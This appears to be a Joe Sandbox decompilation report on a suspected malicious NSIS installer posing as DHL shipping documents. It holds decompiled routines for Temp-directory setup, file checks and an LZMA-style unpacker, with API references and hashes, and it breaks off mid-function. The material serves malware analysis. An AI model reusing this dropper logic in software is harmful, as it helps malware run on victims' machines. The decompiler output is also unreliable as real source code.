                        				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                        					_push(0xfffffff5);
                        					E00401423();
                        				} else {
                        					E00401423(0xffffffe6);
                        					E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t36 + 8));
                        					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                        					if(_t23 == 0) {
                        						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                        					}
                        				}
                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                        				return 0;
                        			}












                        APIs
                          • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                          • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 1892508949-501415292
                        • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                        • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                        • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                        • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 750 40603f-40605a call 406668 call 405fe2 755 406060-40606d call 4068ef 750->755 756 40605c-40605e 750->756 760 40607d-406081 755->760 761 40606f-406075 755->761 757 4060b8-4060ba 756->757 763 406097-4060a0 lstrlenW 760->763 761->756 762 406077-40607b 761->762 762->756 762->760 764 4060a2-4060b6 call 405f37 GetFileAttributesW 763->764 765 406083-40608a call 40699e 763->765 764->757 770 406091-406092 call 405f83 765->770 771 40608c-40608f 765->771 770->763 771->756 771->770
                        C-Code - Quality: 53%
                        			E0040603F(void* __eflags, intOrPtr _a4) {
                        				int _t11;
                        				signed char* _t12;
                        				long _t16;
                        				intOrPtr _t18;
                        				intOrPtr* _t21;
                        				signed int _t23;
                        
                        				E00406668(0x425f50, _a4);
                        				_t21 = E00405FE2(0x425f50);
                        				if(_t21 != 0) {
                        					E004068EF(_t21);
                        					if(( *0x42a278 & 0x00000080) == 0) {
                        						L5:
                        						_t23 = _t21 - 0x425f50 >> 1;
                        						while(1) {
                        							_t11 = lstrlenW(0x425f50);
                        							_push(0x425f50);
                        							if(_t11 <= _t23) {
                        								break;
                        							}
                        							_t12 = E0040699E();
                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                        								E00405F83(0x425f50);
                        								continue;
                        							} else {
                        								goto L1;
                        							}
                        						}
                        						E00405F37();
                        						_t16 = GetFileAttributesW(??); // executed
                        						return 0 | _t16 != 0xffffffff;
                        					}
                        					_t18 =  *_t21;
                        					if(_t18 == 0 || _t18 == 0x5c) {
                        						goto L1;
                        					} else {
                        						goto L5;
                        					}
                        				}
                        				L1:
                        				return 0;
                        			}










                        APIs
                          • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                          • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                        • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00406098
                        • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004060A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                        • String ID: P_B
                        • API String ID: 3248276644-906794629
                        • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                        • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                        • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                        • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 99%
                        			E00407194() {
                        				signed int _t530;
                        				void _t537;
                        				signed int _t538;
                        				signed int _t539;
                        				unsigned short _t569;
                        				signed int _t579;
                        				signed int _t607;
                        				void* _t627;
                        				signed int _t628;
                        				signed int _t635;
                        				signed int* _t643;
                        				void* _t644;
                        
                        				L0:
                        				while(1) {
                        					L0:
                        					_t530 =  *(_t644 - 0x30);
                        					if(_t530 >= 4) {
                        					}
                        					 *(_t644 - 0x40) = 6;
                        					 *(_t644 - 0x7c) = 0x19;
                        					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                        					while(1) {
                        						L145:
                        						 *(_t644 - 0x50) = 1;
                        						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                        						while(1) {
                        							L149:
                        							if( *(_t644 - 0x48) <= 0) {
                        								goto L155;
                        							}
                        							L150:
                        							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                        							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                        							 *(_t644 - 0x54) = _t643;
                        							_t569 =  *_t643;
                        							_t635 = _t569 & 0x0000ffff;
                        							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                        							if( *(_t644 - 0xc) >= _t607) {
                        								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                        								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                        								_t628 = _t627 + 1;
                        								 *_t643 = _t569 - (_t569 >> 5);
                        								 *(_t644 - 0x50) = _t628;
                        							} else {
                        								 *(_t644 - 0x10) = _t607;
                        								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                        								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                        							}
                        							if( *(_t644 - 0x10) >= 0x1000000) {
                        								L148:
                        								_t487 = _t644 - 0x48;
                        								 *_t487 =  *(_t644 - 0x48) - 1;
                        								L149:
                        								if( *(_t644 - 0x48) <= 0) {
                        									goto L155;
                        								}
                        								goto L150;
                        							} else {
                        								L154:
                        								L146:
                        								if( *(_t644 - 0x6c) == 0) {
                        									L169:
                        									 *(_t644 - 0x88) = 0x18;
                        									L170:
                        									_t579 = 0x22;
                        									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                        									_t539 = 0;
                        									L172:
                        									return _t539;
                        								}
                        								L147:
                        								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                        								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                        								_t484 = _t644 - 0x70;
                        								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                        								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                        								goto L148;
                        							}
                        							L155:
                        							_t537 =  *(_t644 - 0x7c);
                        							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                        							while(1) {
                        								L140:
                        								 *(_t644 - 0x88) = _t537;
                        								while(1) {
                        									L1:
                        									_t538 =  *(_t644 - 0x88);
                        									if(_t538 > 0x1c) {
                        										break;
                        									}
                        									L2:
                        									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                        										case 0:
                        											L3:
                        											if( *(_t644 - 0x6c) == 0) {
                        												goto L170;
                        											}
                        											L4:
                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                        											_t538 =  *( *(_t644 - 0x70));
                        											if(_t538 > 0xe1) {
                        												goto L171;
                        											}
                        											L5:
                        											_t542 = _t538 & 0x000000ff;
                        											_push(0x2d);
                        											asm("cdq");
                        											_pop(_t581);
                        											_push(9);
                        											_pop(_t582);
                        											_t638 = _t542 / _t581;
                        											_t544 = _t542 % _t581 & 0x000000ff;
                        											asm("cdq");
                        											_t633 = _t544 % _t582 & 0x000000ff;
                        											 *(_t644 - 0x3c) = _t633;
                        											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                        											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                        											_t641 = (0x300 << _t633 + _t638) + 0x736;
                        											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                        												L10:
                        												if(_t641 == 0) {
                        													L12:
                        													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                        													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                        													goto L15;
                        												} else {
                        													goto L11;
                        												}
                        												do {
                        													L11:
                        													_t641 = _t641 - 1;
                        													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                        												} while (_t641 != 0);
                        												goto L12;
                        											}
                        											L6:
                        											if( *(_t644 - 4) != 0) {
                        												GlobalFree( *(_t644 - 4));
                        											}
                        											_t538 = GlobalAlloc(0x40, 0x600); // executed
                        											 *(_t644 - 4) = _t538;
                        											if(_t538 == 0) {
                        												goto L171;
                        											} else {
                        												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                        												goto L10;
                        											}
                        										case 1:
                        											L13:
                        											__eflags =  *(_t644 - 0x6c);
                        											if( *(_t644 - 0x6c) == 0) {
                        												L157:
                        												 *(_t644 - 0x88) = 1;
                        												goto L170;
                        											}
                        											L14:
                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                        											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                        											_t45 = _t644 - 0x48;
                        											 *_t45 =  *(_t644 - 0x48) + 1;
                        											__eflags =  *_t45;
                        											L15:
                        											if( *(_t644 - 0x48) < 4) {
                        												goto L13;
                        											}
                        											L16:
                        											_t550 =  *(_t644 - 0x40);
                        											if(_t550 ==  *(_t644 - 0x74)) {
                        												L20:
                        												 *(_t644 - 0x48) = 5;
                        												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                        												goto L23;
                        											}
                        											L17:
                        											 *(_t644 - 0x74) = _t550;
                        											if( *(_t644 - 8) != 0) {
                        												GlobalFree( *(_t644 - 8));
                        											}
                        											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                        											 *(_t644 - 8) = _t538;
                        											if(_t538 == 0) {
                        												goto L171;
                        											} else {
                        												goto L20;
                        											}
                        										case 2:
                        											L24:
                        											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                        											 *(_t644 - 0x84) = 6;
                        											 *(_t644 - 0x4c) = _t557;
                        											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                        											goto L132;
                        										case 3:
                        											L21:
                        											__eflags =  *(_t644 - 0x6c);
                        											if( *(_t644 - 0x6c) == 0) {
                        												L158:
                        												 *(_t644 - 0x88) = 3;
                        												goto L170;
                        											}
                        											L22:
                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                        											_t67 = _t644 - 0x70;
                        											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                        											__eflags =  *_t67;
                        											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                        											L23:
                        											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                        											if( *(_t644 - 0x48) != 0) {
                        												goto L21;
                        											}
                        											goto L24;
                        										case 4:
                        											L133:
                        											_t559 =  *_t642;
                        											_t626 = _t559 & 0x0000ffff;
                        											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                        											if( *(_t644 - 0xc) >= _t596) {
                        												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                        												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                        												 *(_t644 - 0x40) = 1;
                        												_t560 = _t559 - (_t559 >> 5);
                        												__eflags = _t560;
                        												 *_t642 = _t560;
                        											} else {
                        												 *(_t644 - 0x10) = _t596;
                        												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                        												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                        											}
                        											if( *(_t644 - 0x10) >= 0x1000000) {
                        												goto L139;
                        											} else {
                        												goto L137;
                        											}
                        										case 5:
                        											L137:
                        											if( *(_t644 - 0x6c) == 0) {
                        												L168:
                        												 *(_t644 - 0x88) = 5;
                        												goto L170;
                        											}
                        											L138:
                        											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                        											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                        											L139:
                        											_t537 =  *(_t644 - 0x84);
                        											L140:
                        											 *(_t644 - 0x88) = _t537;
                        											goto L1;
                        										case 6:
                        											L25:
                        											__edx = 0;
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												L36:
                        												__eax =  *(__ebp - 4);
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x34) = 1;
                        												 *(__ebp - 0x84) = 7;
                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                        												goto L132;
                        											}
                        											L26:
                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                        											__esi =  *(__ebp - 0x60);
                        											__cl = 8;
                        											__cl = 8 -  *(__ebp - 0x3c);
                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                        											__ecx =  *(__ebp - 0x3c);
                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                        											__ecx =  *(__ebp - 4);
                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                        											__eflags =  *(__ebp - 0x38) - 4;
                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        											if( *(__ebp - 0x38) >= 4) {
                        												__eflags =  *(__ebp - 0x38) - 0xa;
                        												if( *(__ebp - 0x38) >= 0xa) {
                        													_t98 = __ebp - 0x38;
                        													 *_t98 =  *(__ebp - 0x38) - 6;
                        													__eflags =  *_t98;
                        												} else {
                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                        												}
                        											} else {
                        												 *(__ebp - 0x38) = 0;
                        											}
                        											__eflags =  *(__ebp - 0x34) - __edx;
                        											if( *(__ebp - 0x34) == __edx) {
                        												L35:
                        												__ebx = 0;
                        												__ebx = 1;
                        												goto L61;
                        											} else {
                        												L32:
                        												__eax =  *(__ebp - 0x14);
                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        												__eflags = __eax -  *(__ebp - 0x74);
                        												if(__eax >=  *(__ebp - 0x74)) {
                        													__eax = __eax +  *(__ebp - 0x74);
                        													__eflags = __eax;
                        												}
                        												__ecx =  *(__ebp - 8);
                        												__ebx = 0;
                        												__ebx = 1;
                        												__al =  *((intOrPtr*)(__eax + __ecx));
                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                        												goto L41;
                        											}
                        										case 7:
                        											L66:
                        											__eflags =  *(__ebp - 0x40) - 1;
                        											if( *(__ebp - 0x40) != 1) {
                        												L68:
                        												__eax =  *(__ebp - 0x24);
                        												 *(__ebp - 0x80) = 0x16;
                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        												__eax =  *(__ebp - 0x28);
                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        												__eax =  *(__ebp - 0x2c);
                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        												__eax = 0;
                        												__eflags =  *(__ebp - 0x38) - 7;
                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        												__al = __al & 0x000000fd;
                        												__eax = (__eflags >= 0) - 1 + 0xa;
                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                        												__eax =  *(__ebp - 4);
                        												__eax =  *(__ebp - 4) + 0x664;
                        												__eflags = __eax;
                        												 *(__ebp - 0x58) = __eax;
                        												goto L69;
                        											}
                        											L67:
                        											__eax =  *(__ebp - 4);
                        											__ecx =  *(__ebp - 0x38);
                        											 *(__ebp - 0x84) = 8;
                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                        											goto L132;
                        										case 8:
                        											L70:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__eax =  *(__ebp - 4);
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x84) = 0xa;
                        												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                        											} else {
                        												__eax =  *(__ebp - 0x38);
                        												__ecx =  *(__ebp - 4);
                        												__eax =  *(__ebp - 0x38) + 0xf;
                        												 *(__ebp - 0x84) = 9;
                        												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                        												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                        											}
                        											goto L132;
                        										case 9:
                        											L73:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												goto L90;
                        											}
                        											L74:
                        											__eflags =  *(__ebp - 0x60);
                        											if( *(__ebp - 0x60) == 0) {
                        												goto L171;
                        											}
                        											L75:
                        											__eax = 0;
                        											__eflags =  *(__ebp - 0x38) - 7;
                        											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                        											__eflags = _t259;
                        											0 | _t259 = _t259 + _t259 + 9;
                        											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                        											goto L76;
                        										case 0xa:
                        											L82:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												L84:
                        												__eax =  *(__ebp - 4);
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x84) = 0xb;
                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                        												goto L132;
                        											}
                        											L83:
                        											__eax =  *(__ebp - 0x28);
                        											goto L89;
                        										case 0xb:
                        											L85:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												__ecx =  *(__ebp - 0x24);
                        												__eax =  *(__ebp - 0x20);
                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        											} else {
                        												__eax =  *(__ebp - 0x24);
                        											}
                        											__ecx =  *(__ebp - 0x28);
                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        											L89:
                        											__ecx =  *(__ebp - 0x2c);
                        											 *(__ebp - 0x2c) = __eax;
                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        											L90:
                        											__eax =  *(__ebp - 4);
                        											 *(__ebp - 0x80) = 0x15;
                        											__eax =  *(__ebp - 4) + 0xa68;
                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                        											goto L69;
                        										case 0xc:
                        											L99:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												L164:
                        												 *(__ebp - 0x88) = 0xc;
                        												goto L170;
                        											}
                        											L100:
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t334 = __ebp - 0x70;
                        											 *_t334 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t334;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											__eax =  *(__ebp - 0x2c);
                        											goto L101;
                        										case 0xd:
                        											L37:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												L159:
                        												 *(__ebp - 0x88) = 0xd;
                        												goto L170;
                        											}
                        											L38:
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t122 = __ebp - 0x70;
                        											 *_t122 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t122;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											L39:
                        											__eax =  *(__ebp - 0x40);
                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                        												goto L48;
                        											}
                        											L40:
                        											__eflags = __ebx - 0x100;
                        											if(__ebx >= 0x100) {
                        												goto L54;
                        											}
                        											L41:
                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                        											__ecx =  *(__ebp - 0x58);
                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                        											 *(__ebp - 0x48) = __eax;
                        											__eax = __eax + 1;
                        											__eax = __eax << 8;
                        											__eax = __eax + __ebx;
                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        											__ax =  *__esi;
                        											 *(__ebp - 0x54) = __esi;
                        											__edx = __ax & 0x0000ffff;
                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                        											__eflags =  *(__ebp - 0xc) - __ecx;
                        											if( *(__ebp - 0xc) >= __ecx) {
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        												__cx = __ax;
                        												 *(__ebp - 0x40) = 1;
                        												__cx = __ax >> 5;
                        												__eflags = __eax;
                        												__ebx = __ebx + __ebx + 1;
                        												 *__esi = __ax;
                        											} else {
                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                        												 *(__ebp - 0x10) = __ecx;
                        												0x800 = 0x800 - __edx;
                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                        												__ebx = __ebx + __ebx;
                        												 *__esi = __cx;
                        											}
                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                        											 *(__ebp - 0x44) = __ebx;
                        											if( *(__ebp - 0x10) >= 0x1000000) {
                        												goto L39;
                        											} else {
                        												L45:
                        												goto L37;
                        											}
                        										case 0xe:
                        											L46:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												L160:
                        												 *(__ebp - 0x88) = 0xe;
                        												goto L170;
                        											}
                        											L47:
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t156 = __ebp - 0x70;
                        											 *_t156 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t156;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											while(1) {
                        												L48:
                        												__eflags = __ebx - 0x100;
                        												if(__ebx >= 0x100) {
                        													break;
                        												}
                        												L49:
                        												__eax =  *(__ebp - 0x58);
                        												__edx = __ebx + __ebx;
                        												__ecx =  *(__ebp - 0x10);
                        												__esi = __edx + __eax;
                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                        												__ax =  *__esi;
                        												 *(__ebp - 0x54) = __esi;
                        												__edi = __ax & 0x0000ffff;
                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        												__eflags =  *(__ebp - 0xc) - __ecx;
                        												if( *(__ebp - 0xc) >= __ecx) {
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        													__cx = __ax;
                        													_t170 = __edx + 1; // 0x1
                        													__ebx = _t170;
                        													__cx = __ax >> 5;
